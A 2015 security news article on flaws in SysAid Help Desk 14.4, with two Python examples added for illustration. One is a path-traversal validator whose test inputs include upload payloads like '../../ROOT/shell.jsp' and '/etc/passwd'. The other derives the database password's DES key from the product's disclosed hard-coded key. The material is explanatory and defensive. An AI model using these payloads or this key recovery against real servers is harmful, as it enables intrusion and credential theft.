Some exploits integrated in Metasploit modules

Jun 4, 2015 08:05 GMT

A set of security flaws in the SysAid Help Desk software, used by organizations in more than 140 countries, could let an attacker download and upload files and execute arbitrary code without authentication.

SysAid is an ITSM (IT service management) product designed to improve a company’s help desk performance via an intuitive platform that allows assigning incident tickets based on their importance and the department responsible for solving them.

IT administrators can also use the platform to manage software and hardware assets in the company, create custom reports or pull analytics.

The company boasts a user base of more than 10,000 organizations, comprising big names like Coca Cola, Adobe, LG, Panasonic and IKEA.

Risk of remote code execution

Security researcher Pedro Ribeiro analyzed version 14.4 of the software and found a total of 11 security holes, ten of them affecting the Windows edition and one affecting the Linux release. Metasploit modules exploiting six of them are already available and can be used for penetration testing.

The most serious of the flaws lets an attacker create an administrator account without authenticating or supplying any information at all.

The issue is tracked as CVE-2015-2993. Ribeiro notes that it can be exploited only once per installation, and that restarting the Apache Tomcat server does not make it exploitable again.

Two further issues allow arbitrary files to be uploaded through directory traversal (CVE-2015-2994 and CVE-2015-2995). Exploiting one of them requires an administrator account, while the other can be used without any authentication, the researcher says; in both cases the upload leads to remote code execution.
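The upload and download bugs share one root cause: a client-supplied file name is joined onto a server directory without checking that the result still lies inside it, so "../" sequences walk out of the intended folder, and an upload becomes code execution once a server-side script lands somewhere the servlet container will run it. The example below is added here to illustrate that check and is not code from SysAid or from the advisory; the directory layout, field names and sample inputs are constructed for the demonstration. It contrasts the naive join with a validator that normalizes the path, confirms containment, and refuses extensions the container would execute, which is the same guard a download handler needs against CVE-2015-2996-style reads.

```python
import posixpath

# Hypothetical deployment layout (not taken from SysAid's real install tree).
WEBROOT = "/opt/sysaid/tomcat/webapps"
UPLOAD_DIR = posixpath.join(WEBROOT, "sysaid", "uploads")

# Anything the servlet container might execute must never be accepted,
# even when the path itself stays inside the upload directory.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".txt", ".log"}


def vulnerable_target(filename):
    """The pattern behind most traversal bugs: trust the client-supplied name
    and join it straight onto the base directory. ".." is never resolved or
    checked, so the write lands wherever the attacker points it."""
    return posixpath.join(UPLOAD_DIR, filename)


def validate_upload(filename):
    """Return (ok, detail). On success detail is the resolved on-disk path;
    on failure it is the reason the name was rejected."""
    if not filename or "\x00" in filename:
        return False, "empty name or embedded NUL byte"
    # SysAid's affected edition runs on Windows, where a backslash is also a
    # separator; fold it before normalizing so "..\\..\\" is caught as well.
    filename = filename.replace("\\", "/")
    # Resolve "." and ".." lexically. Note that join() with an absolute name
    # discards the base entirely, which the containment check below catches.
    candidate = posixpath.normpath(posixpath.join(UPLOAD_DIR, filename))
    # Containment: the resolved path must still sit under UPLOAD_DIR.
    # commonpath compares whole components, so "uploads-old" is not "uploads".
    if posixpath.commonpath([UPLOAD_DIR, candidate]) != UPLOAD_DIR:
        return False, f"path escapes upload directory: {candidate}"
    ext = posixpath.splitext(candidate)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} not allowed"
    return True, candidate


def demo():
    # Constructed inputs: the first is the shape of request an attacker sends
    # to drop a JSP into a sibling web application and get code execution.
    for name in ("../../ROOT/shell.jsp", "..\\..\\ROOT\\shell.jsp",
                 "/etc/passwd", "shell.jsp", "avatar.png"):
        print(f"{name!r:28} naive   -> {vulnerable_target(name)}")
        print(f"{'':28} checked -> {validate_upload(name)}")


if __name__ == "__main__":
    demo()
```

The check is lexical on purpose: it runs before anything touches the filesystem, so it also covers names of files that do not exist yet. On a real Windows host a second check with `os.path.realpath` after the file is written guards against symlinks and drive-letter tricks that a pure string comparison cannot see.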

Hard-coded sensitive data

Ribeiro also found that SysAid ships with a hard-coded cryptographic key and encryption parameters. Combined with an arbitrary file download vulnerability (CVE-2015-2996) in the same product, this lets an attacker retrieve the server configuration file and decrypt the database password it contains.

In the advisory published on Wednesday, the researcher says the password is encrypted with DES using a key derived through MD5, and that the hard-coded key is "inigomontoya". Because that key is identical in every installation, anyone holding a copy of the configuration file can reproduce the decryption offline.
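The following example, added here and not taken from SysAid or from the advisory, shows why a hard-coded key defeats the encryption: with the key known, the only remaining inputs are the salt and iteration count, and those sit in the same configuration file as the ciphertext. It assumes that "DES with an MD5 hash" refers to Java's standard PBEWithMD5AndDES scheme, whose key derivation is PKCS#5 PBKDF1 with MD5; the configuration layout, field names, salt and ciphertext are constructed for the demonstration and do not reflect SysAid's real file format.

```python
import base64
import hashlib
import re

# Key disclosed in Ribeiro's advisory, shipped identically in every installation.
HARDCODED_PASSWORD = b"inigomontoya"

# Constructed sample, not a real SysAid configuration file. The field names
# and layout are hypothetical; the point is that salt and iteration count are
# stored next to the ciphertext, so a copy of the file is all that is needed.
SAMPLE_CONFIG = """\
dbUser=sysaid
dbPassword.alg=PBEWithMD5AndDES
dbPassword.salt=0a1b2c3d4e5f6071
dbPassword.iterations=1000
dbPassword.ciphertext=AAAAAAAAAAAAAAAAAAAAAA==
"""


def pbkdf1_md5(password, salt, iterations):
    """PKCS#5 v1.5 PBKDF1 with MD5, the derivation behind Java's
    PBEWithMD5AndDES:  T1 = MD5(P || S),  Ti = MD5(T(i-1)).
    The 16-byte result is split into an 8-byte DES key and an 8-byte CBC IV."""
    if len(salt) != 8 or iterations < 1:
        raise ValueError("PBKDF1/MD5 needs an 8-byte salt and at least 1 iteration")
    t = hashlib.md5(password + salt).digest()
    for _ in range(iterations - 1):
        t = hashlib.md5(t).digest()
    return t[:8], t[8:16]


def parse_config(text):
    """Pull the encryption parameters out of the hypothetical config format."""
    fields = dict(re.findall(r"^dbPassword\.(\w+)=(\S+)$", text, re.M))
    return {
        "alg": fields["alg"],
        "salt": bytes.fromhex(fields["salt"]),
        "iterations": int(fields["iterations"]),
        "ciphertext": base64.b64decode(fields["ciphertext"]),
    }


def recover_key_material(config_text, password=HARDCODED_PASSWORD):
    """What an attacker holding a downloaded config file can compute offline:
    the exact DES key and IV the server itself uses for the database password.
    Feeding (key, iv, ciphertext) to DES-CBC with PKCS#5 padding, e.g. via
    pycryptodome's DES.new(key, DES.MODE_CBC, iv), yields the plaintext;
    DES is not in the standard library, so that last step is not shown here."""
    params = parse_config(config_text)
    if params["alg"] != "PBEWithMD5AndDES":
        raise ValueError(f"unexpected algorithm {params['alg']}")
    key, iv = pbkdf1_md5(password, params["salt"], params["iterations"])
    return key, iv, params["ciphertext"]


if __name__ == "__main__":
    key, iv, ct = recover_key_material(SAMPLE_CONFIG)
    print("DES key :", key.hex())
    print("CBC IV  :", iv.hex())
    print("cipher  :", ct.hex())
```

The derivation is deterministic, so the key printed above is the same one the server computed when it encrypted the value. Per-installation secrets kept outside the downloadable file (or, better, OS-level credential storage) are the fix; a stronger cipher alone would not help while the key still ships in the product.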

The administrator password for the SQL Server Express database bundled with SysAid for Windows is hard-coded as well.

The vendor says that the current update, SysAid 15.2, mitigates the issues. Ribeiro has not tested the new release and cannot confirm that all of the vulnerabilities have been addressed.

Photo gallery (2 images): SysAid capabilities; Service Desk in SysAid.